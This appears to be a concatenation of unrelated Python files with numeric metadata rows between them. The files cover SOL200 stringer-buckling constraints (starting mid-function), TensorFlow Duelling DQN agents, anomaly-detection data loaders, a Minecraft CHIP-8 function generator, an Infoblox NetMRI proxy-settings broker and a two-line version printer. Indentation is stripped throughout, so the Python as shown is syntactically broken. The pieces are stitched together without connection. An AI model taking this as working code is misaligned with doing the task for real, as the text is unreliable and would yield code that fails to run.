# building DRESP1 that reads:
# - axial stress
OUTC = output_codes_SOL200.OUTC
if eltype == 'CBAR':
atta = OUTC['STRESS']['CBAR']['Axial']
else:
raise NotImplementedError('element %s not implemented' %
eltype)
eid = self.get_central_element().eid
dresp_FA = DRESP1('STRZFA', 'STRESS', 'ELEM', region=None,
atta=atta, attb='', atti=eid)
self.add_dresp(dresp_FA)
# building DRESP2
dresp2 = DRESP2('STRBUCK', deqatn.id)
dresp2.dvars = [dvar_t.id, dvar_b.id]
dresp2.dtable = [dtable_h, dtable_E, dtable_nu]
dresp2.dresp1 = [dresp_FA.id]
self.add_dresp(dresp2)
# applying constraint
dcid = self.constraints['buckling']
dconstr = self.add_constraint(dcid, dresp2, ms, None)
elif method == 1 and self.profile.lower() == 'z_t_b_h':
# buckling equation
deqatn = DEQATN(
'bf(t, b, h, E, nu, FA) = b-t/2.;'
'bw = h-t;'
'x = bf/bw;'
'Kw = -206.08*x**5 + 588.3*x**4 - 596.43*x**3 '
'+ 249.62*x**2 -41.924*x + 6.4545;'
'SIGMAcr = Kw*PI(1)**2*E*t**2/(12.*(1.-nu**2)*bw**2);'
'MS = SIGMAcr/ABS(MIN(FA, 0.0001))-1.;')
self.add_deqatn(deqatn)
# reading variables
dvar_t = self.dvars['STRZt']
dvar_b = self.dvars['STRZb']
dvar_h = self.dvars['STRZh']
# building DRESP1 that reads:
# - axial stress
OUTC = output_codes_SOL200.OUTC
if eltype == 'CBAR':
atta = OUTC['STRESS']['CBAR']['Axial']
else:
raise NotImplementedError('element %s not implemented' %
eltype)
eid = self.get_central_element().eid
dresp_FA = DRESP1('STRZFA', 'STRESS', 'ELEM', region=None,
atta=atta, attb='', atti=eid)
self.add_dresp(dresp_FA)
# building DRESP2
dresp2 = DRESP2('STRBUCK', deqatn.id)
dresp2.dvars = [dvar_t.id, dvar_b.id, dvar_h.id]
dresp2.dtable = [dtable_E, dtable_nu]
dresp2.dresp1 = [dresp_FA.id]
self.add_dresp(dresp2)
# applying constraint
dcid = self.constraints['buckling']
dconstr = self.add_constraint(dcid, dresp2, ms, None)
elif method == 1 and self.profile.lower() == 'b_t':
# buckling equation
# - considers combined compression + shear
# - disconsiders bending effects
# - assumes 3 edges simply supported and one free unloaded edge
deqatn = DEQATN('kc(t, h, L, E, nu, PC, PS) = 0.456 + (h/L)**2;'
'FCcr = kc*PI(1)**2*E*t**2/(12.*(1.-nu**2)*h**2);'
'FC = PC/(t*h);'
'Rc = FC/FCcr;'
'x = L/h;'
'ks = 0.0648*x**6 - 1.2338*x**5 + 9.4869*x**4 -'
'37.697*x**3 + 81.88*x**2 - 93.218*x + 50.411;'
'ks = MAX(ks, 5.42);'
'FScr = ks*PI(1)**2*E*t**2/(12.*(1.-nu**2)*h**2);'
'FS = PS/(t*h);'
'Rs = FS/FScr;'
'MS = 2./(Rc + SQRT(Rc**2 + 4*Rs**2)) - 1.')
self.add_deqatn(deqatn)
# reading variables
dvar_t = self.dvars['STRBt']
# reading constants
dtable_h = self.dtables['STRBh'][0]
dtable_L = self.dtables['STRBL'][0]
# building DRESP1s that read:
# - axial force
# - shear along Plane 1 (y axis)
OUTC = output_codes_SOL200.OUTC
if eltype == 'CBAR':
code_PC = OUTC['FORCE']['CBAR']['Axial force']
code_PS = OUTC['FORCE']['CBAR']['Shear plane 1']
else:
raise NotImplementedError('element %s not implemented' %
eltype)
eid = self.get_central_element().eid
dresp_PC = DRESP1('STRPC', 'FORCE', 'ELEM', region=None,
atta=code_PC, attb='', atti=eid)
dresp_PS = DRESP1('STRPS', 'FORCE', 'ELEM', region=None,
atta=code_PS, attb='', atti=eid)
self.add_dresp(dresp_PC)
self.add_dresp(dresp_PS)
# building DRESP2
dresp2 = DRESP2('STRBUCK', deqatn.id)
dresp2.dvars = [dvar_t.id]
dresp2.dtable = [dtable_h, dtable_L, dtable_E, dtable_nu]
dresp2.dresp1 = [dresp_PC.id, dresp_PS.id]
self.add_dresp(dresp2)
# applying constraint
dcid = self.constraints['buckling']
dconstr = self.add_constraint(dcid, dresp2, ms, None)
elif method == 1 and self.profile.lower() == 'b_t_h':
# buckling equation
# - considers combined compression + shear
# - disconsiders bending effects
# - assumes 3 edges simply supported and one free unloaded edge
deqatn = DEQATN('kc(t, h, L, E, nu, PC, PS) = 0.456 + (h/L)**2;'
'FCcr = kc*PI(1)**2*E*t**2/(12.*(1.-nu**2)*h**2);'
'FC = PC/(t*h);'
'Rc = FC/FCcr;'
'x = L/h;'
'ks = 0.0648*x**6 - 1.2338*x**5 + 9.4869*x**4 -'
'37.697*x**3 + 81.88*x**2 - 93.218*x + 50.411;'
'ks = MAX(ks, 5.42);'
'FScr = ks*PI(1)**2*E*t**2/(12.*(1.-nu**2)*h**2);'
'FS = PS/(t*h);'
'Rs = FS/FScr;'
'MS = 2./(Rc + SQRT(Rc**2 + 4*Rs**2)) - 1.')
self.add_deqatn(deqatn)
# reading variables
dvar_t = self.dvars['STRBt']
dvar_h = self.dvars['STRBh']
# reading constants
dtable_L = self.dtables['STRBL'][0]
# building DRESP1s that read:
# - axial force
# - shear along Plane 1 (y axis)
OUTC = output_codes_SOL200.OUTC
if eltype == 'CBAR':
code_PC = OUTC['FORCE']['CBAR']['Axial force']
code_PS = OUTC['FORCE']['CBAR']['Shear plane 1']
else:
raise NotImplementedError('element %s not implemented' %
eltype)
eid = self.get_central_element().eid
dresp_PC = DRESP1('STRPC', 'FORCE', 'ELEM', region=None,
atta=code_PC, attb='', atti=eid)
dresp_PS = DRESP1('STRPS', 'FORCE', 'ELEM', region=None,
atta=code_PS, attb='', atti=eid)
self.add_dresp(dresp_PC)
self.add_dresp(dresp_PS)
# building DRESP2
dresp2 = DRESP2('STRBUCK', deqatn.id)
dresp2.dvars = [dvar_t.id, dvar_h.id]
dresp2.dtable = [dtable_L, dtable_E, dtable_nu]
dresp2.dresp1 = [dresp_PC.id, dresp_PS.id]
self.add_dresp(dresp2)
# applying constraint
dcid = self.constraints['buckling']
dconstr = self.add_constraint(dcid, dresp2, ms, None)
else:
raise NotImplementedError('Stringer %s profile not supported!' %
self.profile)
| 41.208494
| 74
| 0.506699
| 1,336
| 10,673
| 3.946108
| 0.15494
| 0.029211
| 0.027314
| 0.006639
| 0.848445
| 0.848445
| 0.814871
| 0.808422
| 0.792868
| 0.792868
| 0
| 0.056856
| 0.347419
| 10,673
| 258
| 75
| 41.368217
| 0.700072
| 0.172398
| 0
| 0.847458
| 0
| 0.118644
| 0.225477
| 0.03331
| 0
| 0
| 0
| 0
| 0
| 1
| 0.00565
| false
| 0
| 0.011299
| 0
| 0.016949
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f46f3db573e71c793d978b7aa9e833f0c84104fd
| 10,713
|
py
|
Python
|
tf_rl/agents/unstable/Duelling_DQN_model.py
|
Rowing0914/TF_RL
|
68e5e9a23e38ed2d8ac5f97d380567b919a3d2e7
|
[
"MIT"
] | 23
|
2019-04-04T17:34:56.000Z
|
2021-12-14T19:34:10.000Z
|
tf_rl/agents/unstable/Duelling_DQN_model.py
|
Rowing0914/TF_RL
|
68e5e9a23e38ed2d8ac5f97d380567b919a3d2e7
|
[
"MIT"
] | 5
|
2020-11-13T17:40:40.000Z
|
2022-03-12T00:11:33.000Z
|
tf_rl/agents/unstable/Duelling_DQN_model.py
|
Rowing0914/TF_RL
|
68e5e9a23e38ed2d8ac5f97d380567b919a3d2e7
|
[
"MIT"
] | 3
|
2019-07-17T23:56:36.000Z
|
2022-03-13T03:55:21.000Z
|
import tensorflow as tf
import os
from tf_rl.common.utils import huber_loss
class Duelling_DQN:
"""
Duelling DQN Agent
"""
def __init__(self):
"""
define your model here!
"""
pass
def predict(self, sess, state):
"""
predict q-values given a state
:param sess:
:param state:
:return:
"""
return sess.run(self.pred, feed_dict={self.state: state})
def update(self, sess, state, action, Y):
feed_dict = {self.state: state, self.action: action, self.Y: Y}
summaries, total_t, _, loss = sess.run([self.summaries, tf.train.get_global_step(), self.train_op, self.loss],
feed_dict=feed_dict)
# print(action, Y, sess.run(self.idx_flattened, feed_dict=feed_dict))
self.summary_writer.add_summary(summaries, total_t)
return loss
class Duelling_DQN_CartPole(Duelling_DQN):
"""
Duelling DQN Agent
"""
def __init__(self, scope, dueling_type, env, loss_fn="MSE", grad_clip_flg=True):
self.scope = scope
self.num_action = env.action_space.n
self.summaries_dir = "../logs/summary_{}".format(scope)
self.grad_clip_flg = grad_clip_flg
if self.summaries_dir:
summary_dir = os.path.join(self.summaries_dir, "summaries_{}".format(scope))
if not os.path.exists(summary_dir):
os.makedirs(summary_dir)
self.summary_writer = tf.summary.FileWriter(summary_dir)
with tf.variable_scope(scope):
self.state = tf.placeholder(shape=[None, env.observation_space.shape[0]], dtype=tf.float32, name="X")
self.Y = tf.placeholder(shape=[None], dtype=tf.float32, name="Y")
self.action = tf.placeholder(shape=[None], dtype=tf.int32, name="action")
fc1 = tf.keras.layers.Dense(16, activation=tf.nn.relu)(self.state)
fc2 = tf.keras.layers.Dense(16, activation=tf.nn.relu)(fc1)
self.pred = tf.keras.layers.Dense(self.num_action, activation=tf.nn.relu)(fc2)
self.state_value = tf.keras.layers.Dense(1, activation=tf.nn.relu)(fc2)
if dueling_type == "avg":
# Q(s,a;theta) = V(s;theta) + (A(s,a;theta)-Avg_a(A(s,a;theta)))
self.output = tf.math.add(self.state_value, tf.math.subtract(self.pred, tf.reduce_mean(self.pred)))
elif dueling_type == "max":
# Q(s,a;theta) = V(s;theta) + (A(s,a;theta)-max_a(A(s,a;theta)))
self.output = tf.math.add(self.state_value, tf.math.subtract(self.pred, tf.math.reduce_max(self.pred)))
elif dueling_type == "naive":
# Q(s,a;theta) = V(s;theta) + A(s,a;theta)
self.output = tf.math.add(self.state_value, self.pred)
else:
assert False, "dueling_type must be one of {'avg','max','naive'}"
# indices of the executed actions
idx_flattened = tf.range(0, tf.shape(self.output)[0]) * tf.shape(self.output)[1] + self.action
# passing [-1] to tf.reshape means flatten the array
# using tf.gather, associate Q-values with the executed actions
self.action_probs = tf.gather(tf.reshape(self.output, [-1]), idx_flattened)
if loss_fn == "huber_loss":
# use huber loss
self.losses = tf.subtract(self.Y, self.action_probs)
self.loss = huber_loss(self.losses)
# self.loss = tf.reduce_mean(huber_loss(self.losses))
elif loss_fn == "MSE":
# use MSE
self.losses = tf.squared_difference(self.Y, self.action_probs)
self.loss = tf.reduce_mean(self.losses)
else:
assert False
# you can choose whatever you want for the optimiser
# self.optimizer = tf.train.RMSPropOptimizer(0.00025, 0.99, 0.0, 1e-6)
self.optimizer = tf.train.AdamOptimizer()
if self.grad_clip_flg:
# to apply Gradient Clipping, we have to directly operate on the optimiser
# check this: https://www.tensorflow.org/api_docs/python/tf/train/Optimizer#processing_gradients_before_applying_them
# https://stackoverflow.com/questions/49987839/how-to-handle-none-in-tf-clip-by-global-norm
self.gradients, self.variables = zip(*self.optimizer.compute_gradients(self.loss))
# self.clipped_grads_and_vars = [(ClipIfNotNone(grad, -1., 1.), var) for grad, var in self.grads_and_vars]
self.gradients, _ = tf.clip_by_global_norm(self.gradients, 2.5)
self.train_op = self.optimizer.apply_gradients(zip(self.gradients, self.variables))
for i, grad in enumerate(self.gradients):
if grad is not None:
mean = tf.reduce_mean(tf.abs(grad))
tf.summary.scalar('mean_{}'.format(i + 1), mean)
tf.summary.histogram('histogram_{}'.format(i + 1), grad)
else:
self.train_op = self.optimizer.minimize(self.loss)
tf.summary.scalar("loss", tf.reduce_mean(self.loss))
tf.summary.histogram("loss_hist", self.losses)
tf.summary.histogram("q_values_hist", self.pred)
tf.summary.scalar("mean_q_value", tf.math.reduce_mean(self.pred))
tf.summary.scalar("var_q_value", tf.math.reduce_variance(self.pred))
tf.summary.scalar("max_q_value", tf.reduce_max(self.pred))
self.summaries = tf.summary.merge_all()
class Duelling_DQN_Atari(Duelling_DQN):
"""
Duelling DQN Agent
"""
def __init__(self, scope, dueling_type, env, loss_fn="MSE", grad_clip_flg=True):
self.scope = scope
self.num_action = env.action_space.n
self.summaries_dir = "../logs/summary_{}".format(scope)
self.grad_clip_flg = grad_clip_flg
if self.summaries_dir:
summary_dir = os.path.join(self.summaries_dir, "summaries_{}".format(scope))
if not os.path.exists(summary_dir):
os.makedirs(summary_dir)
self.summary_writer = tf.summary.FileWriter(summary_dir)
with tf.variable_scope(scope):
self.state = tf.placeholder(shape=[None, 84, 84, 1], dtype=tf.float32, name="X")
self.Y = tf.placeholder(shape=[None], dtype=tf.float32, name="Y")
self.action = tf.placeholder(shape=[None], dtype=tf.int32, name="action")
conv1 = tf.keras.layers.Conv2D(32, kernel_size=8, strides=8, activation=tf.nn.relu)(self.state)
conv2 = tf.keras.layers.Conv2D(64, kernel_size=4, strides=2, activation=tf.nn.relu)(conv1)
conv3 = tf.keras.layers.Conv2D(64, kernel_size=3, strides=1, activation=tf.nn.relu)(conv2)
flat = tf.keras.layers.Flatten()(conv3)
fc1 = tf.keras.layers.Dense(512, activation=tf.nn.relu)(flat)
self.pred = tf.keras.layers.Dense(self.num_action, activation=tf.nn.relu)(fc1)
self.state_value = tf.keras.layers.Dense(1, activation=tf.nn.relu)(fc1)
if dueling_type == "avg":
# Q(s,a;theta) = V(s;theta) + (A(s,a;theta)-Avg_a(A(s,a;theta)))
self.output = tf.math.add(self.state_value, tf.math.subtract(self.pred, tf.reduce_mean(self.pred)))
elif dueling_type == "max":
# Q(s,a;theta) = V(s;theta) + (A(s,a;theta)-max_a(A(s,a;theta)))
self.output = tf.math.add(self.state_value, tf.math.subtract(self.pred, tf.math.reduce_max(self.pred)))
elif dueling_type == "naive":
# Q(s,a;theta) = V(s;theta) + A(s,a;theta)
self.output = tf.math.add(self.state_value, self.pred)
else:
assert False, "dueling_type must be one of {'avg','max','naive'}"
# indices of the executed actions
idx_flattened = tf.range(0, tf.shape(self.output)[0]) * tf.shape(self.output)[1] + self.action
# passing [-1] to tf.reshape means flatten the array
# using tf.gather, associate Q-values with the executed actions
self.action_probs = tf.gather(tf.reshape(self.output, [-1]), idx_flattened)
if loss_fn == "huber_loss":
# use huber loss
self.losses = tf.subtract(self.Y, self.action_probs)
self.loss = huber_loss(self.losses)
# self.loss = tf.reduce_mean(huber_loss(self.losses))
elif loss_fn == "MSE":
# use MSE
self.losses = tf.squared_difference(self.Y, self.action_probs)
self.loss = tf.reduce_mean(self.losses)
else:
assert False
# you can choose whatever you want for the optimiser
# self.optimizer = tf.train.RMSPropOptimizer(0.00025, 0.99, 0.0, 1e-6)
self.optimizer = tf.train.AdamOptimizer()
if self.grad_clip_flg:
# to apply Gradient Clipping, we have to directly operate on the optimiser
# check this: https://www.tensorflow.org/api_docs/python/tf/train/Optimizer#processing_gradients_before_applying_them
# https://stackoverflow.com/questions/49987839/how-to-handle-none-in-tf-clip-by-global-norm
self.gradients, self.variables = zip(*self.optimizer.compute_gradients(self.loss))
# self.clipped_grads_and_vars = [(ClipIfNotNone(grad, -1., 1.), var) for grad, var in self.grads_and_vars]
self.gradients, _ = tf.clip_by_global_norm(self.gradients, 2.5)
self.train_op = self.optimizer.apply_gradients(zip(self.gradients, self.variables))
for i, grad in enumerate(self.gradients):
if grad is not None:
mean = tf.reduce_mean(tf.abs(grad))
tf.summary.scalar('mean_{}'.format(i + 1), mean)
tf.summary.histogram('histogram_{}'.format(i + 1), grad)
else:
self.train_op = self.optimizer.minimize(self.loss)
tf.summary.scalar("loss", tf.reduce_mean(self.loss))
tf.summary.histogram("loss_hist", self.losses)
tf.summary.histogram("q_values_hist", self.pred)
tf.summary.scalar("mean_q_value", tf.math.reduce_mean(self.pred))
tf.summary.scalar("var_q_value", tf.math.reduce_variance(self.pred))
tf.summary.scalar("max_q_value", tf.reduce_max(self.pred))
self.summaries = tf.summary.merge_all()
| 50.295775
| 133
| 0.597218
| 1,433
| 10,713
| 4.319609
| 0.153524
| 0.027141
| 0.018094
| 0.029079
| 0.89273
| 0.877221
| 0.870436
| 0.86042
| 0.854281
| 0.842003
| 0
| 0.0154
| 0.272659
| 10,713
| 212
| 134
| 50.533019
| 0.779004
| 0.188649
| 0
| 0.775194
| 0
| 0
| 0.045178
| 0.004916
| 0
| 0
| 0
| 0
| 0.031008
| 1
| 0.03876
| false
| 0.007752
| 0.023256
| 0
| 0.100775
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f47ee1dcaf669a6f2bf521e702afba239b9b308e
| 4,193
|
py
|
Python
|
src/datasets/oe.py
|
wych1005/Deep-SAD-PyTorch
|
af93186a38ed30985dc155d1b00b90aa181cfe0b
|
[
"MIT"
] | null | null | null |
src/datasets/oe.py
|
wych1005/Deep-SAD-PyTorch
|
af93186a38ed30985dc155d1b00b90aa181cfe0b
|
[
"MIT"
] | null | null | null |
src/datasets/oe.py
|
wych1005/Deep-SAD-PyTorch
|
af93186a38ed30985dc155d1b00b90aa181cfe0b
|
[
"MIT"
] | null | null | null |
from torch.utils.data import DataLoader, Subset
from base.base_dataset import BaseADDataset
from base.oe_dataset import OEDataset, Tiled32
from .preprocessing import create_semisupervised_setting
import torch
class OEADD_dataset(BaseADDataset):
def __init__(self, modality: str, root: str, dataset_name: str, n_known_outlier_classes: int = 0, ratio_known_normal: float = 0.0,
ratio_known_outlier: float = 0.0, ratio_pollution: float = 0.0):
super().__init__(root)
# Define normal and outlier classes
self.n_classes = 2 # 0: normal, 1: outlier
self.normal_classes = (0,)
self.outlier_classes = (1,)
if n_known_outlier_classes == 0:
self.known_outlier_classes = ()
else:
self.known_outlier_classes = (1,)
# Get train set
train_set = OEDataset(root=self.root, dataset_name=dataset_name, train=True, modality=modality)
# Create semi-supervised setting
idx, _, semi_targets = create_semisupervised_setting(train_set.targets.cpu().data.numpy(), self.normal_classes,
self.outlier_classes, self.known_outlier_classes,
ratio_known_normal, ratio_known_outlier, ratio_pollution)
train_set.semi_targets[idx] = torch.tensor(semi_targets) # set respective semi-supervised labels
# Subset train_set to semi-supervised setup
self.train_set = Subset(train_set, idx)
# Get test set
self.test_set = OEDataset(root=self.root, dataset_name=dataset_name, train=False, modality=modality)
def loaders(self, batch_size: int, shuffle_train=True, shuffle_test=False, num_workers: int = 0) -> (DataLoader, DataLoader):
train_loader = DataLoader(dataset=self.train_set, batch_size=batch_size, shuffle=shuffle_train,
num_workers=num_workers, drop_last=True)
test_loader = DataLoader(dataset=self.test_set, batch_size=batch_size, shuffle=shuffle_test,
num_workers=num_workers, drop_last=False)
return train_loader, test_loader
class Tiled32_dataset(BaseADDataset):
def __init__(self, modality: str, root: str, dataset_name: str, n_known_outlier_classes: int = 0, ratio_known_normal: float = 0.0,
ratio_known_outlier: float = 0.0, ratio_pollution: float = 0.0):
super().__init__(root)
# Define normal and outlier classes
self.n_classes = 2 # 0: normal, 1: outlier
self.normal_classes = (0,)
self.outlier_classes = (1,)
if n_known_outlier_classes == 0:
self.known_outlier_classes = ()
else:
self.known_outlier_classes = (1,)
# Get train set
train_set = Tiled32(root=self.root, dataset_name=dataset_name, train=True, modality=modality)
# Create semi-supervised setting
idx, _, semi_targets = create_semisupervised_setting(train_set.targets.cpu().data.numpy(), self.normal_classes,
self.outlier_classes, self.known_outlier_classes,
ratio_known_normal, ratio_known_outlier, ratio_pollution)
train_set.semi_targets[idx] = torch.tensor(semi_targets) # set respective semi-supervised labels
# Subset train_set to semi-supervised setup
self.train_set = Subset(train_set, idx)
# Get test set
self.test_set = Tiled32(root=self.root, dataset_name=dataset_name, train=False, modality=modality)
def loaders(self, batch_size: int, shuffle_train=True, shuffle_test=False, num_workers: int = 0) -> (DataLoader, DataLoader):
train_loader = DataLoader(dataset=self.train_set, batch_size=batch_size, shuffle=shuffle_train,
num_workers=num_workers, drop_last=True)
test_loader = DataLoader(dataset=self.test_set, batch_size=batch_size, shuffle=shuffle_test,
num_workers=num_workers, drop_last=False)
return train_loader, test_loader
| 49.916667
| 134
| 0.651085
| 506
| 4,193
| 5.086957
| 0.13834
| 0.087024
| 0.073815
| 0.053613
| 0.9223
| 0.9223
| 0.9223
| 0.9223
| 0.9223
| 0.9223
| 0
| 0.012342
| 0.265681
| 4,193
| 83
| 135
| 50.518072
| 0.823644
| 0.092297
| 0
| 0.792453
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.075472
| false
| 0
| 0.09434
| 0
| 0.245283
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
be47eeb4ad4bef8cab0137a73a526f2b8270c1ad
| 1,909
|
py
|
Python
|
python_helpers/opcode_8xy1.py
|
RandomBananazz/chip8mc
|
0e184c392a523c82dbc945325aa2cb9e5487e5e7
|
[
"MIT"
] | 3
|
2020-09-28T17:50:49.000Z
|
2020-12-30T18:23:46.000Z
|
python_helpers/opcode_8xy1.py
|
RandomBananazz/chip8mc
|
0e184c392a523c82dbc945325aa2cb9e5487e5e7
|
[
"MIT"
] | null | null | null |
python_helpers/opcode_8xy1.py
|
RandomBananazz/chip8mc
|
0e184c392a523c82dbc945325aa2cb9e5487e5e7
|
[
"MIT"
] | null | null | null |
for x in range(16):
with open(f'..\\data\\cpu\\functions\\opcode_switch\\opcode_8xx1\\opcode_8xx1_{x}.mcfunction', 'w') as f:
f.write(f'scoreboard players operation Global bitwise_1 = Global V{hex(x)[2:].upper()}\n'
f'scoreboard players operation Global bitwise_1 /= c16 Constant\n')
for i in range(16):
f.write(f'execute if score Global PC_nibble_3 matches {i} run function cpu:opcode_switch/opcode_8xx1/opcode_8xx1_{x}-{i}\n')
for x in range(16):
for i in range(16):
with open(f'..\\data\\cpu\\functions\\opcode_switch\\opcode_8xx1\\opcode_8xx1_{x}-{i}.mcfunction', 'w') as f:
f.write(f'scoreboard players operation Global bitwise_2 = Global V{hex(i)[2:].upper()}\n'
f'scoreboard players operation Global bitwise_2 /= c16 Constant\n'
f'function cpu:bitwise_ops/or\n'
f'scoreboard players operation Global copy_1 = Global result\n'
f'scoreboard players operation Global copy_1 *= c16 Constant\n'
f'scoreboard players operation Global bitwise_1 = Global V{hex(x)[2:].upper()}\n'
f'scoreboard players operation Global bitwise_1 %= c16 Constant\n'
f'scoreboard players operation Global bitwise_2 = Global V{hex(i)[2:].upper()}\n'
f'scoreboard players operation Global bitwise_2 %= c16 Constant\n'
f'function cpu:bitwise_ops/or\n'
f'scoreboard players operation Global copy_1 += Global result\n'
f'scoreboard players operation Global V{hex(x)[2:].upper()} = Global copy_1\n')
for x in range(16):
with open('..\\data\\cpu\\functions\\opcode_switch\\opcode_8xx1.mcfunction', 'a') as f:
f.write(f'execute if score Global PC_nibble_2 matches {x} run function cpu:opcode_switch/opcode_8xx1/opcode_8xx1_{x}\n')
| 68.178571
| 136
| 0.633316
| 278
| 1,909
| 4.219424
| 0.165468
| 0.112532
| 0.184143
| 0.276215
| 0.965047
| 0.947997
| 0.925831
| 0.872123
| 0.867008
| 0.807332
| 0
| 0.039392
| 0.242012
| 1,909
| 27
| 137
| 70.703704
| 0.771251
| 0
| 0
| 0.291667
| 0
| 0.083333
| 0.695652
| 0.22944
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
be4ecf8aeb213dcb5fd4e00067855b172ff4a5a4
| 4,666
|
py
|
Python
|
infoblox_netmri/api/broker/v3_8_0/global_proxy_settings_broker.py
|
infobloxopen/infoblox_netmri
|
aa1c744df7e439dbe163bb9edd165e4e85a9771b
|
[
"Apache-2.0"
] | 12
|
2016-02-19T12:37:54.000Z
|
2022-03-04T20:11:08.000Z
|
infoblox_netmri/api/broker/v3_8_0/global_proxy_settings_broker.py
|
infobloxopen/infoblox_netmri
|
aa1c744df7e439dbe163bb9edd165e4e85a9771b
|
[
"Apache-2.0"
] | 18
|
2015-11-12T18:37:00.000Z
|
2021-05-19T07:59:55.000Z
|
infoblox_netmri/api/broker/v3_8_0/global_proxy_settings_broker.py
|
infobloxopen/infoblox_netmri
|
aa1c744df7e439dbe163bb9edd165e4e85a9771b
|
[
"Apache-2.0"
] | 18
|
2016-01-07T12:04:34.000Z
|
2022-03-31T11:05:41.000Z
|
from ..broker import Broker
class GlobalProxySettingsBroker(Broker):
controller = "global_proxy_settings"
def index(self, **kwargs):
"""Returns Global Proxy Settings.
**Inputs**
**Outputs**
"""
return self.api_request(self._get_method_fullname("index"), kwargs)
def decoded_index(self, **kwargs):
"""Returns Global Proxy Settings with password decoded.
**Inputs**
**Outputs**
"""
return self.api_request(self._get_method_fullname("decoded_index"), kwargs)
def collector_proxy(self, **kwargs):
"""Returns Collector Proxy Settings,
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param UnitID: ID of the collector to send the request to, OC only.
:type UnitID: Integer
**Outputs**
"""
return self.api_request(self._get_method_fullname("collector_proxy"), kwargs)
def update_collector(self, **kwargs):
"""Updates proxy settings on collector.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param UnitID: ID of the collector to send the request to, OC only.
:type UnitID: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param username: Username.
:type username: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param password: Password.
:type password: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param proxy_port: Proxy port to set for Global Proxy Settings.
:type proxy_port: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param proxy_address: Proxy address to set for Global Proxy Settings.
:type proxy_address: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param use_global_proxy: Flag which identifies usage of global proxy settings.
:type use_global_proxy: Boolean
**Outputs**
"""
return self.api_request(self._get_method_fullname("update_collector"), kwargs)
def update(self, **kwargs):
"""Updates Global Proxy Settings.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param username: Username.
:type username: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param password: Password.
:type password: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param proxy_port: Proxy port to set for Global Proxy Settings.
:type proxy_port: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param proxy_address: Proxy address to set for Global Proxy Settings.
:type proxy_address: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param use_global_proxy: Flag which identifies usage of global proxy settings.
:type use_global_proxy: Boolean
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param UnitID: ID of the collector to send the request to, OC only.
:type UnitID: Integer
**Outputs**
"""
return self.api_request(self._get_method_fullname("update"), kwargs)
| 28.278788
| 91
| 0.501715
| 443
| 4,666
| 5.185102
| 0.13544
| 0.113191
| 0.073574
| 0.096212
| 0.859382
| 0.859382
| 0.859382
| 0.823683
| 0.823683
| 0.823683
| 0
| 0
| 0.382983
| 4,666
| 164
| 92
| 28.45122
| 0.797846
| 0.589799
| 0
| 0
| 0
| 0
| 0.099738
| 0.027559
| 0
| 0
| 0
| 0
| 0
| 1
| 0.384615
| false
| 0
| 0.076923
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
fe25eceeae71498e83926f83c2b63c4eb7a24b71
| 62
|
py
|
Python
|
testprint.py
|
KodchakornL/GUI-for-take-notes
|
f6dfbaa352e1e0a1c83055dfa6b860a5ab4bac12
|
[
"MIT"
] | null | null | null |
testprint.py
|
KodchakornL/GUI-for-take-notes
|
f6dfbaa352e1e0a1c83055dfa6b860a5ab4bac12
|
[
"MIT"
] | null | null | null |
testprint.py
|
KodchakornL/GUI-for-take-notes
|
f6dfbaa352e1e0a1c83055dfa6b860a5ab4bac12
|
[
"MIT"
] | null | null | null |
import sys
print(sys.version)
import sys
print(sys.version)
| 15.5
| 19
| 0.774194
| 10
| 62
| 4.8
| 0.4
| 0.375
| 0.583333
| 0.708333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.129032
| 62
| 4
| 20
| 15.5
| 0.888889
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.5
| 1
